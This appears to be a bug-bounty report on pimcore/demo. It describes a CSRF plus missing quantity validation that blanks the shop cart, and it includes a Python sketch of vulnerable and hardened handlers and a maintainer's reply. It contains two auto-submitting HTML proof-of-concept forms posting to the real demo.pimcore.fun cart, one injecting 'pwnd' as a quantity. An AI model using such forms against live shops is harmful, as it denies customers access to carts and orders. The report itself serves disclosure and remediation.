CSRF: Lost cart availability to all customers in pimcore/demo
Reported on
Apr 29th 2023
Description
The absence of input validation on the Qty field of the update-cart form causes the feature to error out / render blank when the number is simply replaced with a string. For this to affect all users, CSRF is required, so the severity carries a user-interaction requirement.
So you could say these are two chained bugs (CSRF and improper input validation).
Proof of Concept
1. Normal cart
<html>
<body onload="document.forms[0].submit()">
<form id="myform" action="https://demo.pimcore.fun/en/cart" method="POST">
<input type="hidden" name="items[12]" value="1" />
</form>
</body>
</html>
2. Exploit for the lost cart feature
<html>
<body onload="document.forms[0].submit()">
<form id="myform" action="https://demo.pimcore.fun/en/cart" method="POST">
<input type="hidden" name="items[12]" value="pwnd" />
</form>
</body>
</html>
3. https://demo.pimcore.fun/en/cart will then be blank
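The server-side shape that closes both halves of the chain, written here as an added example (not pimcore/demo's own code; the field name _csrf_token, the MAX_QTY limit and the function names are assumptions): the vulnerable handler trusts the posted value and int("pwnd") blows up, while the hardened one verifies a per-session CSRF token first and then only accepts items[<id>]=<non-negative integer> pairs, returning a structured error instead of a blank page.

```python
"""Handling of the cart "update quantity" POST: vulnerable shape beside hardened shape."""
import hmac
import re

ITEM_KEY = re.compile(r"^items\[([0-9]{1,9})\]$")   # items[12]
QTY_VALUE = re.compile(r"^[0-9]{1,4}$")              # ASCII digits only
MAX_QTY = 999  # assumed per-line limit; not a value from the report


class CartError(ValueError):
    """Rejected request; the caller renders a 400 with a message, not a blank page."""


def update_cart_unsafe(form):
    """Vulnerable shape: every field is trusted. int("pwnd") raises ValueError
    and, with no handler, the cart page renders empty, as the report describes."""
    return {int(k[6:-1]): int(v) for k, v in form.items() if k.startswith("items[")}


def update_cart_safe(form, session_csrf_token):
    """Hardened shape: CSRF check first, then strict per-field validation."""
    submitted = form.get("_csrf_token", "")
    # Constant-time compare; a cross-site auto-submitted form carries no valid token.
    if not session_csrf_token or not hmac.compare_digest(submitted, session_csrf_token):
        raise CartError("missing or invalid CSRF token")
    items = {}
    for key, value in form.items():
        if key == "_csrf_token":
            continue
        m = ITEM_KEY.fullmatch(key)
        if m is None:
            raise CartError(f"unexpected field {key!r}")
        if not QTY_VALUE.fullmatch(value):  # rejects "pwnd", "-1", "1e3", "", unicode digits
            raise CartError(f"quantity for item {m.group(1)} is not a whole number")
        qty = int(value)
        if qty > MAX_QTY:
            raise CartError(f"quantity {qty} exceeds limit {MAX_QTY}")
        items[int(m.group(1))] = qty
    return items


if __name__ == "__main__":
    # Constructed request bodies mirroring the two PoC forms above.
    print(update_cart_safe({"_csrf_token": "tok", "items[12]": "1"}, "tok"))
    try:
        update_cart_safe({"_csrf_token": "tok", "items[12]": "pwnd"}, "tok")
    except CartError as err:
        print("rejected:", err)
```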
Impact
- Lost cart availability to all customers
- Customers can't order any product
References
I tested the demo account provided by the /pimcore/pimcore repo (it can be seen in the readme.md), but when I searched for the vulnerable code snippet I didn't know that what was shown pointed to the /demo repo.
Hi, this is valid but the severity is too high since this issue belongs to the demo repository for educational purposes. Thanks!